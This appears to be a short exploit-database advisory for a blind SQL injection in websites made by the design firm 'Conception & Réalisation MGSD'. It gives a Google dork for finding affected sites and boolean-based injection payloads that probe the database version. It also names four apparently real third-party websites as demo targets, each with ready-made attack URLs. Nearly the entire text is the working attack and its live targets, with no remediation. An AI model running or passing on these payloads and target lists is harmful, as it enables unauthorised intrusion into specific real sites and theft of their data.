*********************************************************
#Exploit Title: Conception & Réalisation MGSD - Blind Sql Injection Vulnerability
#Date: 2023-09-11
#Exploit Author: Behrouz Mansoori
#Google Dork: "Conception & Réalisation MGSD"
#Category:webapps
#Tested On: Mac, Firefox
[+] search Dork : "Conception & Réalisation MGSD"
[+] First add "and true" and then "and false" to the end of the link :
* Target.com/index.php?lang=1 true
* Target.com/index.php?lang=1 false
### Demo 1:
* http://www.lakelec.com/under_products_marechal.php?id=6%27%20and%20true--+
* http://www.lakelec.com/under_products_marechal.php?id=6%27%20and%20false--+
* http://www.lakelec.com/under_products_marechal.php?id=6%27%20and%20substring(@@version,1,1)=5--+
### Demo 2:
* https://www.scetenergie.com/solution_detail.php?id=1%27%20and%20true--+
* https://www.scetenergie.com/solution_detail.php?id=1%27%20and%20false--+
* https://www.scetenergie.com/solution_detail.php?id=1%27%20and%20substring(@@version,1,1)=1--+
### Demo 3:
* https://www.cmcelqods-dz.com/notre-expertise-details.php?id=2%27%20and%20true--+
* https://www.cmcelqods-dz.com/notre-expertise-details.php?id=2%27%20and%20false--+
* https://www.cmcelqods-dz.com/notre-expertise-details.php?id=2%27%20and%20substring(@@version,1,1)=1--+
### Demo 4:
* https://www.sagps.dz/details-news.php?id=1%27%20and%20true--+
* https://www.sagps.dz/details-news.php?id=1%27%20and%20false--+
* https://www.sagps.dz/details-news.php?id=1%27%20and%20substring(@@version,1,1)=1--+
*********************************************************
#Discovered by: Behrouz mansoori
#Instagram: Behrouz_mansoori
#Email: mr.mansoori@yahoo.com
*********************************************************